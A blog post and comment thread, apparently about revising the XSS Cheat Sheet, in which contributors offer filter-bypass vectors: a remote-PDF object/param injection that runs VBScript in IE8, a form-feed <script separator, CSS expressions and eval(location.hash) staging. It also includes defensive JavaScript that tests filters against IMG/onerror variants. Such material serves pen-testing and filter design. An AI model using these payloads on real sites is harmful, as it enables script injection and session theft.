Hey guys - sorry I haven't posted in a while. Busy busy busy. But I'm here to solicit your help! I finally got around to re-testing all of the old vectors, updating them and writing it all up for the next revision of the XSS Cheat Sheet. What I haven't done is add new vectors in yet. So this is your chance if you have known about something for years, want it on the page and want credit for having found it. If you do want to update the cheat sheet with something here's the deal:

1) It must work in one of the browsers listed
2) It must work _without_ user interaction - onmouseover is great and all but it's terrible for demonstration purposes.
3) It must fire a popup with text at a minimum - alert(1) is fine for some things but in reality it must at least pop text to prove that it works for the folks who use this for pen-testing.
4) It must be _significantly_ different from all current vectors listed - by significantly I mean it can't replace a char or two. It's gotta actually be different.
5) It must be a way to bypass filters - not just a JavaScript obfuscation technique - although it might be worthwhile to have one JavaScript obfuscation technique in there (the best/most important) and point back to tra.ckers or the thread on sla.ckers for the rest, since it's really its own thing.

The goal of the XSS Cheat Sheet was never to make a completely exhaustive list - but rather to bring together unique filters to get people thinking about all the possibilities. It's a cheat-sheet after all! Here's a link to the new page (it will eventually replace the old page and/or I may keep the old page as a revision for posterity): http://ha.ckers.org/xss2.html

So fire away with new vectors only. Oh yeah, and if you paste something here that's identical to something that's already been on the page for three or four years now, I'm going to put a doorknob in a sock and beat you with it. Control-F isn't that hard.

1. Works in Internet Explorer 8 (may work in earlier versions of IE)
2. No user interaction needed.
3. It alerts text.
4. None of the other vectors use a PDF as the payload. In this case, the PDF is invoking VBScript.
5. It can be used to bypass filters and is not just JS obfuscation.

Kuza's actual XSS was <object data=anything_at_all.pdf><param name=src value="http://p42.us/xss.pdf"></param></object> which may also warrant a separate entry due to the unique way the object src attribute is used. None of the other vectors really do this (with the src attribute).

@Rsnake - can you number them? It would make it a lot easier to refer to the different injections. Also, will you cover two-stage injections at all - like eval(name) and eval(location.hash)? I see these as above just 'obfuscation'. They are useful ways to inject a *real* XSS payload (not just a harmless alert) when the size of the injection is a serious constraint.

This is particularly interesting in EUC-JP/Shift_JIS etc. environments - or in case nullbytes or similar stop the web-server from delivering content. Was reported several weeks ago but considered to be 'not our bug'.

And you can put a form feed chr(12) between the <script and src elements in Internet Explorer.
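The form-feed trick in the comment above works because a tokenizer that accepts U+000C as whitespace between a tag name and its first attribute does not care that a regex filter did not. The following is an added example written for this page, not code from the original post or from the cheat sheet; the sample script URLs and the two filter regexes are constructed for illustration, and the tokenizer model is a deliberate simplification of the HTML start-tag rules.

```javascript
// Added example (not from the original post or the cheat sheet): a filter that
// only treats space, tab, CR and LF as whitespace misses "<script\fsrc=...",
// while an HTML tokenizer (and IE, as the comment above notes) accepts U+000C
// between a tag name and its first attribute.

// Naive filter: the four "obvious" whitespace characters only.
const NAIVE_SCRIPT_SRC = /<script[ \t\r\n]+src/i;

// HTML tokenizer whitespace: TAB, LF, FF, CR, SPACE.
const HTML_WS = "[ \\t\\n\\f\\r]";
const HTML_SCRIPT_SRC = new RegExp("<script" + HTML_WS + "+src", "i");

function naiveFilterCatches(html) {
  return NAIVE_SCRIPT_SRC.test(html);
}

function htmlWsFilterCatches(html) {
  return HTML_SCRIPT_SRC.test(html);
}

// Simplified model of the tokenizer's view of a start tag: the tag name runs
// until HTML whitespace, "/" or ">", then any run of HTML whitespace starts the
// attribute list. Returns the tag name, the separator bytes and the first
// attribute name, or null if the input does not begin with a start tag.
function tokenizeStartTag(s) {
  const m = /^<([A-Za-z][^\t\n\f\r \/>]*)([\t\n\f\r ]+)([^\t\n\f\r =\/>]+)/.exec(s);
  if (!m) return null;
  return { tag: m[1].toLowerCase(), separator: m[2], attr: m[3].toLowerCase() };
}

// Constructed samples; the host name is a placeholder, not a real payload.
const SAMPLES = {
  normal:   '<script src="http://example.invalid/x.js"></script>',
  formFeed: '<script\fsrc="http://example.invalid/x.js"></script>',
  tab:      '<script\tsrc="http://example.invalid/x.js"></script>',
};

// Run both filters and the tokenizer model over every sample and return the
// verdicts keyed by sample label.
function compareFilters(samples) {
  const out = {};
  for (const [label, html] of Object.entries(samples)) {
    const tok = tokenizeStartTag(html);
    out[label] = {
      naive: naiveFilterCatches(html),
      htmlWs: htmlWsFilterCatches(html),
      parsedAttr: tok ? tok.attr : null,
    };
  }
  return out;
}

console.log(JSON.stringify(compareFilters(SAMPLES), null, 2));
```

The tokenizer model reports `src` as the first attribute for the form-feed sample just as it does for the space and tab samples, while only the naive filter lets it through. The wider lesson is the one the cheat sheet keeps making: a regex over the raw markup is guessing at what the browser will parse, so a filter should either run a real HTML parser and serialize an allow-list, or at minimum use the same whitespace set the tokenizer does.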

@Gareth - all of the onreadystatechange ones mentioned above should be covered given that it's mentioned in the Event Handlers list already. Unless you think there's some other reason it should be called out independently. Also, CSS expressions are already on the cheat sheet. New vectors should be new, not minor variants on existing vectors. I want to stay away from trying to enumerate every variant possible.

@Kuza55 @Gareth - you're right - <object data="xss.pdf"></object> only works on same domain. I should have checked that before. Makes the fact that the param version works at all the stranger/cooler though :)

@Gareth - seriously relax, it'll be okay. I'm not saying you're dumb, I just don't want to make the cheat sheet a cheat book. onReadyStateChange, as I said, is already on the cheat sheet in the event handlers section. Can you give me a good reason it needs to be included beyond that? Specific now, not just "It evades filters" - why is it important? And no, I'm not putting 10 of the same event handler on there. I may make one note of it and enumerate why it's different, but only if it's really worth mentioning.

The CSS vectors are at least somewhat repeats of one another. A few of them I do think belong on there, but I can't put every single variant and still make it readable. If one or two are notable, or if you can combine them all into one, that's much better. Otherwise it'll get even more unruly than it is now. Again, it's a cheat sheet, not a cheat book. The goal is to make it nice and compact and above all useful!

Now that said, I agree the <IMG SRC vectors seem a little out of context if you're thinking about wOw factor. But I definitely wasn't when I wrote this. Remember, the original reason I put it on there was to enumerate what chars needed to be there or not. At least once a week I run into a vector that requires that certain chars are not present. So these all make sense in that context. Perhaps they could be collapsed into other vectors, but yes, needing or not needing double quotes is something that needs to be spelled out at least somewhere on the cheat sheet. In fact, I removed the one with &quot; below, because it's redundant with the last one and I changed one of the others to use onerror because I think people were thinking that image tags weren't dangerous anymore because IE changed their behavior in IE7.0. That's what I get for retaining a document that dates back to IE6.

It may be worth including the CSS expression vector with the minor variant that fixes the looping issue. I say this only because the variant is what makes the vector practical. Originally seen: http://sla.ckers.org/forum/read.php?2,15812#msg-15849
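RSnake's point above about the IMG SRC variants, that their job is to spell out which characters a vector needs and which it can do without, is something a small script can answer for a whole list once a filter's blocklist is known. The following is an added example written for this page, not code from the cheat sheet or from anyone in the thread; the vectors in VECTORS are constructed illustrations in the cheat sheet's IMG/onerror style rather than its actual entries, and the character list is an assumption about what filters commonly strip or encode.

```javascript
// Added example, not part of the cheat sheet: for each vector, list the
// filter-sensitive characters it contains, then pick the vectors that survive
// a given blocklist. FILTER_SENSITIVE is an assumption about what filters
// commonly strip or encode; extend it for the target you are testing.
const FILTER_SENSITIVE = ['<', '>', '"', "'", '(', ')', ';', '/', '=', '&', ' ', '\\'];

// Characters from FILTER_SENSITIVE that appear in the vector, in a stable
// order. This reports what the vector as written contains; it cannot know
// whether a different spelling would avoid a character, which is exactly why
// the cheat sheet keeps minimal variants side by side.
function requiredChars(vector) {
  const present = new Set(vector);
  return FILTER_SENSITIVE.filter((c) => present.has(c));
}

// Vectors that use none of the blocked characters.
function vectorsAvoiding(vectors, blocked) {
  return vectors.filter((v) => !requiredChars(v).some((c) => blocked.includes(c)));
}

// Constructed vectors in the cheat sheet's IMG/onerror style; not its entries.
const VECTORS = [
  '<IMG SRC="x" onerror="alert(\'XSS\')">',
  "<IMG SRC=x onerror=alert('XSS')>",
  '<IMG SRC=x onerror=alert(String.fromCharCode(88,83,83))>',
  '<IMG SRC=x onerror=alert(/XSS/.source)>',
];

// One row per vector: the vector and the sensitive characters it needs.
function report(vectors) {
  return vectors.map((v) => ({ vector: v, needs: requiredChars(v).join('') }));
}

console.log(report(VECTORS));
console.log('no quotes:', vectorsAvoiding(VECTORS, ['"', "'"]));
console.log('no quotes, no slash:', vectorsAvoiding(VECTORS, ['"', "'", '/']));
```

With both quote characters blocked only the String.fromCharCode and regex-source variants survive, and adding the slash to the blocklist leaves just the String.fromCharCode one. Running this over a real vector list against the blocklist you observed in a target's filter is a quicker starting point than reading the whole sheet, but the output is only as good as the variants in the list, which is RSnake's argument for keeping the minimal ones.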